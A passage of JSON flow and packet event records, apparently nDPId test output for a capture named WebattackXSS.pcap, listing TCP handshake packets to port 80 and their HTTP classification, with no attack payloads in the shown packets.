-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347324538,"flow_last_seen":1499347324538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347324538,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1499347324538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347324538,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uCpAAD4GDaasEAABwKgKMtquAFARp\/xAAAAAAKACchAweQAAAgQFtAQCCAoBOkRqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1499347324538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347324538,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2q5SOt2REaf8QaAScSDnxwAAAgQFtAQCCAoD5BXgATpEagEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2970,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1499347324539,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347324539,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uCtAAD4GDa2sEAABwKgKMtquAFARp\/xBUjrdkoAQAOWGzwAAAQEICgE6RGoD5BXg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347325777,"flow_last_seen":1499347325777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347325777,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1499347325777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347325777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C\/ZAAD4GudqsEAABwKgKMtq8AFA4wE5pAAAAAKACchC19AAAAgQFtAQCCAoBOkWfAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2981,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1499347325777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347325777,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2rxxlybyOMBOaqAScSADUQAAAgQFtAQCCAoD5BcVATpFnwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2983,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1499347325777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347325777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C\/dAAD4GueGsEAABwKgKMtq8AFA4wE5qcZcm84AQAOWiVwAAAQEICgE6RaAD5BcV"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347328298,"flow_last_seen":1499347328298,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347328298,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1499347328298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347328298,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K4RAAD4GmkysEAABwKgKMtrWAFBZCmOSAAAAAKACchB98AAAAgQFtAQCCAoBOkgWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1499347328299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347328299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2tYFgFaJWQpjk6AScSAFVgAAAgQFtAQCCAoD5BmMATpIFgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3000,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":3,"flow_last_seen":1499347328299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347328299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K4VAAD4GmlOsEAABwKgKMtrWAFBZCmOTBYBWioAQAOWkXQAAAQEICgE6SBYD5BmM"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3010,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347329594,"flow_last_seen":1499347329594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347329594,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3010,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1499347329594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347329594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8olxAAD4GI3SsEAABwKgKMtrkAFD4u+sGAAAAAKACchBVeAAAAgQFtAQCCAoBOklaAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":2,"flow_last_seen":1499347329594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347329594,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2uSvjPx7+LvrB6AScSCLmgAAAgQFtAQCCAoD5BrQATpJWgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3012,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":3,"flow_last_seen":1499347329595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347329595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ol1AAD4GI3usEAABwKgKMtrkAFD4u+sHr4z8fIAQAOUqogAAAQEICgE6SVoD5BrQ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347332137,"flow_last_seen":1499347332137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347332137,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1499347332137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347332137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hpdAAD4GPzmsEAABwKgKMtr+AFAKS81CAAAAAKACchBfGAAAAgQFtAQCCAoBOkvVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1499347332137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347332137,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2v58hG58CkvNQ6AScSBTxwAAAgQFtAQCCAoD5B1LATpL1QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1499347332138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347332138,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hphAAD4GP0CsEAABwKgKMtr+AFAKS81DfIRufYAQAOXyzQAAAQEICgE6S9YD5B1L"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347333419,"flow_last_seen":1499347333419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1499347333419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347333419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bENAAD4GWY2sEAABwKgKMtsMAFCNWiFVAAAAAKACchCGpwAAAgQFtAQCCAoBOk0WAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1499347333420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347333420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2wzHhupcjVohVqAScSCzMgAAAgQFtAQCCAoD5B6MATpNFgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":3,"flow_last_seen":1499347333420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347333420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bERAAD4GWZSsEAABwKgKMtsMAFCNWiFWx4bqXYAQAOVSOgAAAQEICgE6TRYD5B6M"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347334667,"flow_last_seen":1499347334667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347334667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1499347334667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347334667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ruhAAD4GFuisEAABwKgKMtsaAFCxtOCmAAAAAKACchChtQAAAgQFtAQCCAoBOk5OAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1499347334667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347334667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2xqx52s8sbTgp6AScSBhyAAAAgQFtAQCCAoD5B\/EATpOTgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3054,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1499347334668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347334668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rulAAD4GFu+sEAABwKgKMtsaAFCxtOCnsedrPYAQAOUA0AAAAQEICgE6Tk4D5B\/E"} 